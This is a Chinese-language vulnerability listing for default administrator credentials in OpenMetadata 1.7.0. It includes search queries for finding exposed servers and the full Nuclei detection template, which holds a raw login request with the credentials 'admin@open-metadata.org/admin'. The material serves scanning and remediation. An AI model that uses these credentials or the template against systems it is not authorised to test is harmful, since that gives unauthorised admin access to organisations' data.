漏洞信息
漏洞名称: OpenMetadata 默认登录凭证漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: OpenMetadata是一个开源的元数据管理平台,旨在帮助组织管理和发现其数据资产。它广泛应用于企业环境中,用于数据治理、数据发现和数据质量管理。该平台默认启用了管理员凭证(admin@open-metadata.org/admin),这使得攻击者可以利用这些默认凭证执行未授权操作。这种漏洞属于弱口令问题,其技术根源在于系统部署时未强制修改默认的管理员账户和密码,导致安全配置不当。攻击者可以利用这些默认凭证登录系统,进而执行各种管理操作,如修改配置、访问敏感数据等,严重威胁到企业数据的安全性和隐私性。由于这种漏洞不需要复杂的攻击技术即可利用,因此其风险等级被评估为高危。企业应立即修改默认凭证,并实施强密码策略,以防范此类安全威胁。
产品厂商: open-metadata
产品名称: OpenMetadata
影响版本: 1.7.0
搜索语法: title=”OpenMetadata”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/2a4f36f1404ebde1fbf960191e3580b27d633c04/http%2Fdefault-logins%2Fopenmetadata-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
id: openmetadata-default-login
info:
name: OpenMetadata - Default Login
author: icarot
severity: high
description: |
OpenMetadata server enables default admin credentials. An attacker can execute unauthorized operations.
reference:
- https://github.com/open-metadata/OpenMetadata
classification:
cpe: cpe:2.3:a:open-metadata:openmetadata:1.7.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: open-metadata
product: OpenMetadata
fofa-query: title="OpenMetadata"
shodan-query: title:"OpenMetadata"
tags: misconfig,openmetadata,default-login
variables:
username: admin@open-metadata.org
password: admin
http:
- raw:
- |
POST /api/v1/users/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"email":"{{username}}","password": "{{base64("{{password}}")}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"accessToken":'
- '"refreshToken":'
- '"expiryDuration":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
|